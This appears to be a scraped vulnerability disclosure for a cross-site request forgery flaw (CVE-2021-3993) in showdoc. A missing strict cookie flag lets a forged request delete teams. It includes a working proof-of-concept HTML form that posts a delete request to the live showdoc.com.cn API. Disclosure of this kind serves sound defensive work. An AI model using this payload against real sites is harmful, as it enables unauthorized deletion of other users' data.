CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

**Description**

You set the `strict` flag only for one of your cookies named `cookie_token` but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name `PHPSESSID` don't have `strict` flag.

**Proof of Concept**

1.replace `38046` with the `team id`

2.open poc.html and click on submit button.

3.after that the team with id `38046` or your replaced team id will be deleted.

//poc.html

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
          <input type="hidden" name="id" value="38046" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

**Occurences**

Headline

CVE-2021-3993: Cross-Site Request Forgery (CSRF) in showdoc

CVE: Latest News